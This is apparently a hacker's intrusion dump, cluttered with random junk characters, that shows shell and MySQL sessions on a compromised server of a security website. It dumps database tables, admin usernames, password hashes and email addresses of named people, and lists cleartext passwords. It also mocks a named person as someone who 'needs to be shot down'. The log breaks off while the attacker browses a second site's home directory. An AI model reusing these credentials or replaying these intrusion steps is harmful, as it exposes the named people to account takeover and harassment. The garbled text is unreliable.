g- Y/ G) `8 S& z <channel>/ {( I9 C% z% O1 c% m" j& b
<title>ASTALAVISTA.com - Exploits</title>7 F x, r2 ]7 X/ J. ^; M
<link>http://www.astalavista.com/exploits</link>
0 c/ J% \% t% U, V; P <description>All availably Exploits.</description>
0 d$ v' W3 y$ U <language>en-us</language>" e+ y( i" f0 V: d" `1 e
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>. _: K% R# h9 l7 n' M
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
) D" V6 t% F5 G. P! V3 r: g$ Y# U% c <generator>Astalavista.com</generator>9 R$ z" Z: p9 q f& x4 L4 D. {) V! l
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘* N; N" n6 D- Q! M" }% _
</channel>3 f# N/ U) h! B: {+ C
</rss>’;: F$ }$ M0 x1 {. M: V }
: n. T. t* B; P ]: x if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {6 e. ^0 }) ?4 l7 k& O5 n4 m
unlink (FULLPATH . ‘/feed/exploits.xml’);
7 }$ Q0 m- D" R9 Z }3 F+ y+ y, N) ]0 V8 [/ J5 B
4 @1 ^' ~4 \5 d* j* |
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
/ ^7 ?3 i- o2 t! f& k[snip]6 M! G* ~ J) O. Z. C# l
4 h" b" w3 ^# D7 Y. x# u
sh-3.2$ cat exploits.sh: ?% i- c$ A' W2 | E
#!/bin/sh h6 B' k3 z& i2 S @/ Z" n4 G
6 @( T) B: C- N; Y# Z* G3 H
###########################################################
2 _2 r; V! y9 g' U3 k( A# #; G; B3 d* D( l& m- @9 T6 g
# Title: milw0rm exploits adder # r9 {; ~2 b" F! f7 E1 n; Z: g
# Description: Add all milw0rm exploits to the #
3 @. n/ V, b% e( L# Astalavista.com database #
5 p, Z3 v: ]9 a" W# #
0 l. {7 `) b6 T( y% a5 G4 U# Company: Astalavista Group #% ]6 {0 v! ]; ?
# Author: Paulo M. Santos #: I- }0 c' J8 C, N4 |
# E-Mail: 链接标记paulo.santos@astalavista.ch #
# f/ m: E S( H8 R+ U' x! }# #/ x! ]) l2 r' ^* Q2 h# f! [' d
###########################################################6 `) H% K2 P F; D3 h0 |9 p
( C& B% W9 S: D9 C+ a
# path9 Q( \( E5 C- ~2 _" D# z2 q
this_path=/home/com/public_html/modifications/cronjobs# A+ @3 W6 v- P0 |# p o
1 H- }0 n1 v; q- P# change directory
. ^! P* l' l; X6 @3 N" B& R Fcd $this_path2 S6 B2 l1 {$ w# M2 G
cd tmp/
- B; f+ G( e. x1 x# O& o# V+ r5 o+ i3 h
# delete files w3 D3 D4 _+ K3 N
rm -rf milw0rm.tar.* &) z" v7 d0 O3 P
rm -rf milw0rm/ &7 A( s( g2 a5 y, K0 b [
, F. N6 I$ ~ Q' j; u9 \# wget milw0rm paket, G* n" Q. |0 X+ s8 q
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
) @+ v8 n9 `% [, T4 G* _6 Z! m0 R' U8 F7 j. m) ` {+ J
# extract milw0rm paket0 Q: B8 Z' E8 ` }- f6 q# ~
tar -xvf milw0rm.tar.bz2* ~4 d7 h" o. Q* A
7 I, Y9 v& M2 D+ o( J# change owner
" J+ i) S9 p/ u2 e/ mchown -R com .
) o" c4 j1 H& E+ k! @5 Uchgrp -R com .% ^& U: _, W" b
' g9 X7 ]# C3 Y" Q# execute php script
) F* B) }+ ?3 Ecd $this_path
* f; w6 i+ l: Vphp -q exploits.php
: M, j; X9 b6 }, e; Q1 r4 [& u1 }" I. j4 e$ m
# delete files" F/ c+ u( e" n- m% C+ h/ t" {4 {$ _
rm -rf tmp/milw0rm.tar.*
+ f8 I# k& [ h9 }1 c5 j! W8 `rm -rf tmp/milw0rm/
9 Y5 Q" u$ ?- `' G0 t- h$ X7 C% W; o% G
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”) o# R$ |6 g. Q `$ ?" L* m
Paulo M. Santos needs to be shot down.
" k9 ~$ K( f8 l0 x
7 t% ]7 K. W+ h$ xmysql -u contrexxuser2 -p
8 f- [. c# L; {4 t" b5 WEnter password:
' T: t; I* u, A0 A, T MWelcome to the MySQL monitor. Commands end with ; or \g.% o0 b$ b' [1 v) n/ {; M8 \
Your MySQL connection id is 261694* h( K2 r5 O9 A. V9 B7 \7 t% I
Server version: 5.0.45-community-log MySQL Community Edition (GPL)$ w) ?. ?* y5 {5 l- I8 @( N% {) E- g
$ o$ Z* g+ r' r6 k- g9 z8 Z" IType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
7 B& ^* K! i/ B) e/ U4 ~ L" m7 M* ]6 |" i( X! d! E& V
mysql> show databases; d w! p% P( r1 l4 q/ u
+——————–+; D) L7 L1 ?6 e2 j& ~+ ~1 ]. a) Q
| Database |
' I4 m% l. h& V4 O) a2 H( X+——————–+
/ v; g6 d2 k5 T! T K| information_schema |7 Y5 N9 T; Z' i, o4 M5 [
| com_contrexx2 |
. J! |- Y; N" H$ f1 n" }5 ^/ K/ |; h| com_contrexx2_live |
' j6 N) Z! d- P" e# }: |$ q| test |
/ b7 y+ Q# [. a. W! d. |+——————–+' F2 t/ c' p4 j9 u! h
4 rows in set (0.00 sec)/ _% N& @- E+ @% @ ]8 j3 U
+ [ n$ ] Z0 ~, A+ }mysql> use com_contrexx2_live
1 ` S- w; R YDatabase changed$ M9 @0 t3 T1 b* ?# a
mysql> show tables;* \# t2 R7 B% n; x G' R
+————————————————–+% T) S7 ~+ w2 `! x% j% `$ g
| Tables_in_com_contrexx2_live |5 O. V, i( F2 A8 X* U! U% V
+————————————————–+# F& R$ w. n4 g1 _ h, t/ c4 S3 Q9 \
| cc_banner_counter |
- U- b. k% X* k* I( r; ]' w3 x8 b| cc_search_counter |
" G. g7 N: P8 K! J| contrexx_access_group_dynamic_ids |9 }0 X; E( i' X5 W) {+ i, h: r
| contrexx_access_group_static_ids |
. Z4 S3 b, f: }| contrexx_access_rel_user_group |2 E9 i i/ C3 ^$ H" |
| contrexx_access_settings |
0 I. V) B: N3 u| contrexx_access_user_attribute |
4 ~+ g& z0 o3 x* U; B" H/ j4 X1 J| contrexx_access_user_attribute_name |
& C+ \) t; R5 X8 @$ f4 P3 t8 P* w, k( h| contrexx_access_user_attribute_value |0 x- i; C1 X' |6 Y9 V# s7 |
| contrexx_access_user_core_attribute |
b3 Y& x0 f0 W% \; w: p| contrexx_access_user_groups |
, r4 V5 t# ]4 ]1 c. N. E# D| contrexx_access_user_mail |
6 ^; I& ~# ~3 |1 K% d, r4 D1 M| contrexx_access_user_profile |
! w% R. ]' f& s8 M| contrexx_access_user_title |: S. q& v+ O2 b( ?6 l5 r
| contrexx_access_user_validity |
5 t! r( G/ J3 B" [* g5 m| contrexx_access_users |% K1 B; K0 i) [) U( n4 ]: G
| contrexx_backend_areas |
3 j- b+ i7 b% Q, p4 Z7 K7 C| contrexx_backups |
) t$ c" j0 [( o$ b| contrexx_content |
1 ]) B- l9 J6 }8 I' w+ w| contrexx_content_history |
) \- g) l$ L% Y5 A7 [; p5 D* l5 T4 ]| contrexx_content_logfile |
m+ K. Z% r* z2 b, }0 F| contrexx_content_navigation |
$ x! [4 `$ h! j& d| contrexx_content_navigation_history |5 j n$ ]+ Q' M" D6 F3 R: @" E* {
| contrexx_ids |; x& q' G9 `9 [; E |
| contrexx_languages |( s5 M9 k% ` G& S4 F/ b0 a
| contrexx_lib_country |
8 k L3 C8 V9 |/ Y( [2 H4 {0 M. B| contrexx_log |
- y5 v9 z1 H @6 n5 _| contrexx_module_alias_source |
. x+ u# L: S3 c4 u+ d| contrexx_module_alias_target |
* v) D I3 h# m" }( `' e| contrexx_module_block_blocks |
3 L- K; Q& Q" _& O. d) p| contrexx_module_block_rel_lang |+ G* j, A( I6 n& y; O$ @/ S
| contrexx_module_block_rel_pages |) X# |) }2 r8 } ~& ]
| contrexx_module_block_settings |
4 R& X4 t& u7 I3 _1 ?1 }| contrexx_module_blog_categories |
& {& t: n5 [0 K! _7 e2 `6 r| contrexx_module_blog_comments |7 I: O8 Z( ~! z3 ^ g* H7 i
| contrexx_module_blog_message_to_category |
, N5 I( h& N/ C| contrexx_module_blog_messages |
& q8 u% m5 ?% R* c/ D: a| contrexx_module_blog_messages_lang |
* s: r' U2 G" t0 e. c| contrexx_module_blog_networks |8 b+ K4 c# w7 Q. p9 A
| contrexx_module_blog_networks_lang |* p1 S# r* m# U
| contrexx_module_blog_settings |. x) A4 R+ e2 F2 q* l E. W) r
| contrexx_module_blog_votes |
1 a1 ]+ r) w" I; ?& \3 f| contrexx_module_calendar |
7 \. S; V6 R# ]* h+ r6 @& H| contrexx_module_calendar_access |
" ~8 R: R, J' F6 x& ~# o| contrexx_module_calendar_categories |
& a- f) N- {3 E* l7 T' P4 G| contrexx_module_calendar_form_data | O( A+ X* U( \3 ^: c
| contrexx_module_calendar_form_fields |
/ H5 Z; ?$ ?! a; A9 g7 u# W| contrexx_module_calendar_registrations |0 ]; }4 Z/ [& P
| contrexx_module_calendar_settings |
" a0 W$ o( z: I# I t| contrexx_module_calendar_style |+ O, f$ f% t) O3 d. `
| contrexx_module_contact_form |4 G! v# X% z( `! A
| contrexx_module_contact_form_data |2 d+ H) s; X2 k5 c Q; ^3 U. c3 M
| contrexx_module_contact_form_field |, l" u4 |7 n- ]0 @3 ^) t% _1 f; }
| contrexx_module_contact_settings |8 S6 v( y* j( @6 `6 c9 O8 `3 h* k
| contrexx_module_data_categories |
5 V2 A9 D: u. J| contrexx_module_data_message_to_category |! O% P$ G+ q9 F7 J
| contrexx_module_data_messages |6 Y- ^- }/ o/ ]2 `" G
| contrexx_module_data_messages_lang |
3 n9 g# W# M0 f) [+ g| contrexx_module_data_placeholders |: {% A" h0 {$ }8 d1 D' a
| contrexx_module_data_settings |7 |1 j% n. Y b% b' J* U( ?" [1 p
| contrexx_module_directory_access |
3 x7 f0 ?: k5 G! O8 L9 l% m| contrexx_module_directory_categories |
9 a: i& x& v( m+ \# G| contrexx_module_directory_dir |, E/ A0 E' ^$ B- }( ~
| contrexx_module_directory_inputfields |+ h0 @+ y7 N8 m/ L
| contrexx_module_directory_levels |# z1 U6 F: ]5 s3 w; D3 [
| contrexx_module_directory_mail |
3 s- |! K [' n3 ~0 z$ \+ A0 W| contrexx_module_directory_rel_dir_cat |( i0 _$ R" a1 M7 S
| contrexx_module_directory_rel_dir_level |( a/ L4 Z& P! X
| contrexx_module_directory_settings |. r' w1 r j0 ]: Q# L
| contrexx_module_directory_settings_google |
+ x0 A4 ~, G$ |: l3 O| contrexx_module_directory_vote |4 L$ w8 o- s$ } Q: Y
| contrexx_module_docsys |
' N# S( z8 v$ V1 E& O& G9 p r| contrexx_module_docsys_categories |
- H, ~0 F' g3 x3 O* o| contrexx_module_egov_configuration |
# [6 e$ e5 }7 y9 T' d; v: B- N| contrexx_module_egov_orders |
- N! J" r" X+ j7 J| contrexx_module_egov_product_calendar |4 @& s1 T# W+ s0 R5 z) b8 [( M0 |) {
| contrexx_module_egov_product_fields |
. Z* j1 X! E" W9 n8 u| contrexx_module_egov_products |6 k/ o' ^: [/ R# J$ U) s0 u- X
| contrexx_module_egov_settings |$ j; e2 S3 {6 G) H: J, a: ~( p& h
| contrexx_module_exploits |% O+ u6 E9 ]# [( \) {. n
| contrexx_module_exploits_categories |
; b1 [% u- g1 K$ W$ `# j6 Y) A2 C( c| contrexx_module_feed_category |$ b4 E; }2 n: \
| contrexx_module_feed_news |1 g) ~; ^- V. }/ j
| contrexx_module_feed_newsml_association |
; w: R* X0 k( x6 _* b| contrexx_module_feed_newsml_categories |# S" P6 v! R/ K
| contrexx_module_feed_newsml_documents |, T& Q4 S, Y5 @7 N
| contrexx_module_feed_newsml_providers |1 F4 ~/ A8 r0 q+ s6 x, \$ x
| contrexx_module_forum_access |
4 E Y% e. E9 O! E! `1 v: k8 s| contrexx_module_forum_categories |
J5 m1 |4 h5 j% e- D% x( W| contrexx_module_forum_categories_lang |
2 _9 U' J# K# `' E| contrexx_module_forum_notification |
' u# u2 ~1 `5 N+ k! F| contrexx_module_forum_postings |
4 ?7 N8 V' E* |1 ~| contrexx_module_forum_rating |+ @4 Q! t( A g- z
| contrexx_module_forum_settings |+ Q1 b' e8 w8 J5 c! \$ @) X+ v
| contrexx_module_forum_statistics |
# e ~, a, \0 D( l, }| contrexx_module_gallery_categories |+ \% L) |5 M7 t; [+ [
| contrexx_module_gallery_comments |
6 I; N3 r3 a: D6 X7 `* E| contrexx_module_gallery_language |
1 b' Y9 Y# M+ N( H| contrexx_module_gallery_language_pics |
* O% r l: w( g0 n7 |7 C3 ^- L| contrexx_module_gallery_pictures |. R& m B8 o/ {* r5 V) q8 _- L1 e. m
| contrexx_module_gallery_settings |
/ d X9 q7 q1 f* L0 v( f! _) ~1 r| contrexx_module_gallery_votes |
( z6 a: u3 q$ \: I, i2 d| contrexx_module_guestbook |7 k" X* n! w* ?, t* ]) n* z. t
| contrexx_module_guestbook_settings |
* H9 @& J9 ^: I: R8 n. h6 || contrexx_module_livecam |
D# i7 a% y5 b8 D0 U5 [* K| contrexx_module_livecam_settings |- @) {# d& j. e5 f+ H: u3 M
| contrexx_module_market |8 [9 _3 x: |4 `5 j) ^
| contrexx_module_market_access |
- D" n$ o u; F) [8 {| contrexx_module_market_categories |2 F$ Q- q8 ]( M6 C7 l
| contrexx_module_market_mail |1 S3 a' [2 I7 _& J: J; D
| contrexx_module_market_paypal |: N: u8 [$ {6 S! I6 m
| contrexx_module_market_settings |
( E5 r3 s" J0 G3 @" T0 G2 I| contrexx_module_market_spez_fields |
- N8 o* c+ G/ O/ g| contrexx_module_mediadir_access |" j, x8 x: f) {; ?
| contrexx_module_mediadir_categories |0 O6 \8 Y- s$ y0 k, j# P# f
| contrexx_module_mediadir_comments |0 A6 x L Q% I* Q
| contrexx_module_mediadir_dir |
: A; i) e4 ?4 m( R/ ?| contrexx_module_mediadir_inputfields |% [: e5 Q* t: u0 x U
| contrexx_module_mediadir_levels |
% M' ~' G6 [& n& Q| contrexx_module_mediadir_mail |7 ^1 }5 T5 z+ d, L
| contrexx_module_mediadir_rel_dir_cat |
/ n+ O0 _; U C| contrexx_module_mediadir_rel_dir_level |: `! k4 d3 @' A6 Q: ]
| contrexx_module_mediadir_reports |. R3 ~0 P# @8 `2 N
| contrexx_module_mediadir_settings |
4 w! r0 y( [, t& E5 R! a| contrexx_module_mediadir_settings_google |
9 `+ E# L0 j9 C; J' G+ s| contrexx_module_mediadir_vote |
9 H) h, u5 B: g0 B, D6 F| contrexx_module_memberdir_directories |
1 L6 l$ U3 ^4 v: ?5 _; B| contrexx_module_memberdir_name |
- X- b7 M- S2 L6 H `8 Z| contrexx_module_memberdir_settings |8 k: T. s# W' X
| contrexx_module_memberdir_values |
9 v x$ l1 {5 w5 q- Z" U9 U# S E| contrexx_module_nettools_allowed_groups | g7 h- K' b& i$ h. E
| contrexx_module_nettools_settings |9 B5 e L% ^+ g2 y) J! r5 ?
| contrexx_module_news |- L+ V& `( {% z. ?: H
| contrexx_module_news_access |! n7 L1 p# m- {9 S6 Z7 I/ H
| contrexx_module_news_categories |
9 v, W, \( p5 || contrexx_module_news_settings |' x' O9 F" x* M) G$ V" A/ S( j
| contrexx_module_news_teaser_frame |
, { x0 r" t }| contrexx_module_news_teaser_frame_templates |& F: _% {" @, N' _/ p
| contrexx_module_news_ticker |
" r* c: i9 C A( K! m4 ~* P| contrexx_module_newsletter |9 O' z+ n. {+ A$ T: f) p8 |6 y$ l
| contrexx_module_newsletter_attachment |
0 d' W5 J% r' W6 e7 N% y| contrexx_module_newsletter_category |2 o T) ^4 _0 `- c3 y R
| contrexx_module_newsletter_confirm_mail |
* ?' m6 G+ e5 z) O9 x* ~: o& C| contrexx_module_newsletter_rel_cat_news |
/ K$ B0 ~2 E2 p1 H" [| contrexx_module_newsletter_rel_user_cat |
0 D# ^/ b" P6 {7 J| contrexx_module_newsletter_settings |
$ r/ v; F( ]( i| contrexx_module_newsletter_template |
7 p- h' O0 @( |+ g1 e, q- O| contrexx_module_newsletter_tmp_sending |
/ W+ v V. V6 b2 c* @7 d$ ?6 h| contrexx_module_newsletter_user |
( W/ V6 a' a9 z; n- D: W) R| contrexx_module_newsletter_user_title |
3 s2 T9 J/ P/ Y1 R7 E| contrexx_module_onlinetools_defaultports |- j3 M8 n5 m/ D- p# B- J$ S
| contrexx_module_onlinetools_defaultports_back |
/ Q. X1 K: E: |6 V K| contrexx_module_onlinetools_geolitecity_blocks |
$ u8 j H+ A+ Z M; I8 W| contrexx_module_onlinetools_geolitecity_country |
3 e) v7 ^* f0 V) b. Y/ { y4 H3 }| contrexx_module_onlinetools_geolitecity_location |/ y/ I( i; f; h. Y
| contrexx_module_podcast_category |
! n" k( ]% z* _, Q b' ?0 K* x| contrexx_module_podcast_medium |
" X7 c9 d9 h: i V' C- h- x| contrexx_module_podcast_rel_category_lang |' \, b2 {! { m+ |# ]& ?; R
| contrexx_module_podcast_rel_medium_category |
1 e' Y4 g1 P6 I; ~. B| contrexx_module_podcast_settings |
4 v* H' t3 z+ E# E7 D& X7 n| contrexx_module_podcast_template |& j2 y9 X% w9 P3 h1 U4 v
| contrexx_module_proxydb |
9 F: ]- K+ q9 ]( W/ U) z| contrexx_module_recommend |$ F# Y& K9 R2 C4 [ u
| contrexx_module_repository |
2 N+ D/ v2 A5 Q. w: ?' o9 K0 A| contrexx_module_securitynews_cats |
+ G, J: k& i; A+ {| contrexx_module_securitynews_feeds |
; r1 o' i/ N+ t$ ^) h# `8 m| contrexx_module_securitynews_news |5 [, O# M w/ m( ~1 r4 T3 H
| contrexx_module_shop_categories |0 m& M7 {: O" D1 B+ [8 U
| contrexx_module_shop_config |7 e s3 h# R a& T6 U
| contrexx_module_shop_countries |0 m9 e9 ^! M8 {$ H* C
| contrexx_module_shop_currencies |
% h8 d, g% Q) n8 X* R$ w| contrexx_module_shop_customers |
+ \* @5 o4 u4 ^" `" g1 R. I& U| contrexx_module_shop_importimg |
5 M2 Z* x4 l/ I* N; d+ o, ?5 ^| contrexx_module_shop_lsv |. I8 p6 `7 [/ [
| contrexx_module_shop_mail |
& ]" ?: J* V3 S| contrexx_module_shop_mail_content |
; E) |& d; ^: ]7 p3 f I# k2 @' [| contrexx_module_shop_manufacturer |! q; n) T4 v6 {0 P* i
| contrexx_module_shop_order_items |
) A# k6 v2 a9 x( _| contrexx_module_shop_order_items_attributes |/ [+ U" T9 [8 |" N9 Q0 b r$ k1 a, t
| contrexx_module_shop_orders |
6 c4 R+ Y- Q& j$ O| contrexx_module_shop_payment |
! g- |0 r. y; v| contrexx_module_shop_payment_processors |
1 H/ S7 `! C. T3 u| contrexx_module_shop_pricelists |
" ~, o6 {; Y' L; I| contrexx_module_shop_products |
1 O0 w( d3 g' ~| contrexx_module_shop_products_attributes |- J' [ S/ ?% }2 |9 C2 ^
| contrexx_module_shop_products_attributes_name |
5 {8 r/ i9 N$ g' {; F| contrexx_module_shop_products_attributes_value |
, N0 A% @+ O6 _6 q9 {, y. b) H| contrexx_module_shop_products_downloads |9 A0 j8 i( G7 m
| contrexx_module_shop_rel_countries |/ e) V) F2 M' b' s4 N8 m! Y
| contrexx_module_shop_rel_payment |
' l& ~) T8 |4 U! Z| contrexx_module_shop_rel_shipment |7 [; ?3 a/ s; ?/ J# @% |
| contrexx_module_shop_shipment_cost |/ J9 s) f( r5 f+ T5 w
| contrexx_module_shop_shipper |
1 V5 ]/ ?" a; I+ @| contrexx_module_shop_vat |6 c' [$ j0 D$ h ~. J2 E) \8 h
| contrexx_module_shop_zones |
: T, l3 T9 ~0 X \# h& X| contrexx_module_u2u_address_list |
! B4 s4 s, i/ b" x, ^| contrexx_module_u2u_message_log |) b( ^# t) J* |, B, f9 ~
| contrexx_module_u2u_sent_messages |$ ^& M7 T- r; P' f* ?
| contrexx_module_u2u_settings |
/ `( L* w/ o; v! B2 q8 H. r" P| contrexx_module_u2u_user_log | {: t" Y5 t4 O
| contrexx_modules |. |9 x1 a$ q& ^% U+ q
| contrexx_sessions |+ `5 [: [6 a) ]; ^+ o: a- h' J1 r
| contrexx_settings |
$ m1 p' f. h. t, ]| contrexx_settings_smtp |9 N. ]! G b$ m' Z3 W
| contrexx_skins |0 l. _; S1 H2 Y6 z T' V
| contrexx_stats_browser |) C+ \; I x% q
| contrexx_stats_colourdepth |
+ I0 S V }# C; P| contrexx_stats_config |
0 @8 l9 i" T4 W* R| contrexx_stats_country |% N1 H& c6 J# l* h
| contrexx_stats_hostname |
, I' [" a$ C5 ?0 Z; _- T| contrexx_stats_javascript |
$ @& t |- B C! b| contrexx_stats_operatingsystem |* B1 |6 S6 N: D1 O! i. `
| contrexx_stats_referer |8 q; W1 Y3 Y1 c4 Q3 p$ K
| contrexx_stats_requests |* y/ U0 b1 Q7 c6 y: L0 ?0 H
| contrexx_stats_requests_summary |: N6 M2 t! A3 M
| contrexx_stats_screenresolution |
( Z+ [) n& O$ _& ?| contrexx_stats_search |. B* G/ y) q" l" H0 v% d4 P4 b
| contrexx_stats_spiders |
. M% t% R( A) v3 L5 j% P| contrexx_stats_spiders_summary |% w! @3 U9 \8 ^
| contrexx_stats_visitors |
6 d2 U; p$ G9 ]| contrexx_stats_visitors_summary |& v' c+ L. ~9 w% k, ]) x" Y, i- C
| contrexx_voting_additionaldata |
& a: X- b0 A9 z, d' f Z, X. i| contrexx_voting_email |$ `& h k! l# ^0 Z( O
| contrexx_voting_rel_email_system |1 u3 l. m0 d6 k+ P7 Z3 u+ E- E
| contrexx_voting_results |3 C5 l: ^2 ]' q- C
| contrexx_voting_system |- [3 F) |; p+ v7 d5 ]# f
| foo |* f0 O% J9 ^7 ]+ u9 T6 h
+————————————————–+
2 i0 A8 y. o3 ~% c227 rows in set (0.01 sec) Z: a/ i9 e# {" f7 `% ]
% r& M, }" V- @0 w. U6 u, Omysql> select count(*) as skids from contrexx_access_users;
& j# J ], I: B9 K3 V+——-+
) W) L# Z$ ^8 u* [4 w| skids |
5 H5 ?* T/ r8 B3 T+——-+
$ R% H- Z: R3 y( ^5 {# R| 53699 |
' F* g; A5 O7 i/ F0 Y+——-+
' M' c$ i8 Z7 m O; J0 B, g1 row in set (0.00 sec)
; W% K4 R' s- }( B* y2 @2 \; _- M3 F: g& Q: f7 [" X
mysql> describe contrexx_access_users;
: \. ^% ?2 N: R0 K( O0 k2 r. B3 b+——————+——————————————+——+—–+————–+—————-+' i+ _ ^5 d$ |
| Field | Type | Null | Key | Default | Extra |
) }" {3 w2 e+ [* x+——————+——————————————+——+—–+————–+—————-++ l! W+ [! I/ K. ^7 |" p: u2 P
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
; {/ Y& p1 f3 b* V$ t. t| is_admin | tinyint(1) unsigned | NO | | 0 | |
5 @/ k. {9 V2 y# S: D| username | varchar(40) | YES | MUL | NULL | | y2 c$ c- ~' ] U
| password | varchar(32) | YES | | NULL | |
0 u+ b) y$ c& s4 X# g| regdate | int(14) unsigned | NO | | 0 | |
8 i+ X3 ]* [# V" f* [- ?| expiration | int(14) unsigned | NO | | 0 | |
/ b1 b J0 y$ J/ \* p0 b| validity | int(10) unsigned | NO | | 0 | |
- }, y7 K) f* P8 X| last_auth | int(14) unsigned | NO | | 0 | |
3 P6 ~( G2 U5 w. A. D" m, g| last_activity | int(14) unsigned | NO | | 0 | |. V& J1 k. f) t3 T
| email | varchar(255) | YES | | NULL | |
6 c/ G% M& i1 L! r) q2 ~# g| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
, g3 z; |% \2 \ [| frontend_lang_id | int(2) unsigned | NO | | 0 | |( t5 B+ m0 }4 L; T% n/ y
| backend_lang_id | int(2) unsigned | NO | | 0 | |; y+ ^+ X, S5 a* ^' Q' H
| active | tinyint(1) | NO | | 0 | |
* H; I! Z. m4 C6 U| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |$ G- S1 `4 L1 P7 V3 _& l
| restore_key | varchar(32) | NO | | | |
3 P* `3 Y- g7 i7 v) v) L+ w+ u| restore_key_time | int(14) unsigned | NO | | 0 | |7 y' ^( h' ~* f7 e8 f, s: x
| u2u_active | enum(’0′,’1′) | NO | | 1 | |7 h7 o V ^2 B6 ? o
+——————+——————————————+——+—–+————–+—————-+
- m0 D& y5 I6 H d18 rows in set (0.00 sec)
6 Z' X2 E7 k7 ?" M9 [; g
\; S' g: a" M* D# S' `# omysql> select username,password,email from contrexx_access_users where is_admin = 1;
+ T1 O" ~8 x! |/ p+————+———————————-+—————————–+
/ S6 t+ m8 f7 d: U! C| username | password | email |
~+ u1 n/ q) G; [ n) e# r+————+———————————-+—————————–+
7 K; p6 [4 n, D. q( k- w" R| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |% d$ L t \7 i( a
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |2 W" z. W, r9 Z) n/ u1 l
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |8 ]5 L3 o, M; E9 }7 V. @
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
% m h9 a4 k3 }7 Z( M( x$ `3 t* z v+————+———————————-+—————————–+
* R/ Q! Z6 z4 m. H2 q/ w6 X# w4 rows in set (0.04 sec)
0 k$ p F8 @ {; l% o4 I8 R
/ ` W7 i: A; k1 @mysql> exit;
6 u) b; H- H& E5 H- ~- E0 sBye
. V, L8 v. M% G0 D* V5 A x$ p
- u4 y+ Q+ R8 x! b- i[~] There you go, your “team of security and IT professionals” is a joke.
! N3 T1 ~+ U+ P+ j3 }& w: t
# v- W5 Z( l6 y# Y1 @+——————————+
5 h- L8 F$ i( U; g& ~& bsystem:f82BN3+_*
( ]! p7 }8 M1 RBe1er0ph0r:belerophor4astacom( \7 {# o2 q8 L( _4 y
prozac:asta4cms!
5 X. A, Y# {+ {7 }commander:mpbdaagf6m
; K, O$ z! V% ksykadul:ak29eral8 ?3 h: l4 B! S0 i4 L) p r
+——————————+3 }. m/ D9 c) b5 s9 N
+ a% c0 C* A7 G
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
8 P% {- u) k' A' @( ]% \…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
6 l/ T7 k6 P1 i8 l( \* m0 q# R
. z0 t# d+ j! L7 ]$ ~7 m+ X8 g[~] Lets move to astalavista.net now,
0 c7 n8 X+ G. ?- @
6 n, o9 L/ s! UFrom <链接标记[url]https://www.astalavista.net/[/url]>:: b: a) j' D0 i' V3 N0 L0 [
>> Everyone knows that the best defense is a good offense.9 T0 k) Y) l$ N* L
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
& }3 r [. b" y6 _>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
. ^& C. @+ ]" Z>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”( t. t( i2 @. Y, [1 X; o
8 l; o% \" U7 j3 p5 O6 L" v C; U
>> Go ahead, try and hack our server . in a completely legal way!
) N! V: U7 ]% ]* u5 b>> Learn by doing: We offer our members tricky tasks and challenges on an
& S0 ~1 |. x* z0 A: q>> ongoing basis so you can test your knowledge and abilities. You can also( ^; s+ C- Y$ c( p( v) S
>> demonstrate what you.ve mastered by taking part in regular hacker contests
/ N3 H6 x# e. m6 l" j; W>> and war games
& j* V9 x: A5 J& G& x* D" }- [, o" Z4 J" G+ E; ~7 \
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
' c. p* Q2 n2 S
! k5 F" g" l- F) C& D# [+ s" m* W[-] Tricky task: Find home dir of astalavista.net
- ^3 r( V, G2 p2 b. q' f" \( i( t' `
! ^, X% K B2 J7 S. f% w M' L1 v! ]sh-3.2$ ls -la ~astanet# g2 e0 |% a; A! {
total 48
0 C( w+ Q' a- idrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .; F% J8 b3 i) u6 \. a
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..5 r1 E, M5 [: z J" t/ F$ C/ t- [8 H3 |
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth) K0 n1 ~8 r5 |1 W/ K9 f
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
" ^! A0 X) @8 ]7 S' M3 G( N" ?6 q-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
; Y6 i8 J9 F- {7 w" F-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
0 c4 s, [( Y0 R9 U-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc! @5 l: o/ Q7 J# u& v' D
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
% I- G% L4 \2 K& ]( z* ?drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
( K' e$ v( O- R$ pdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
. O9 D& f" N! L' J2 d" |; Plrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
* n' }- r; M3 o p-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
+ ~5 t) k/ u4 n. s# \0 ]" Q9 t/ `5 x7 T7 S" G% q0 t
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
& a: E, H3 L: e; Jsh-3.2$ ls -la
. L' R1 D0 q. y" C2 E& ~) rtotal 2007 _2 z2 Q9 ^! f% q4 U
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .+ o3 a' K, c2 ^
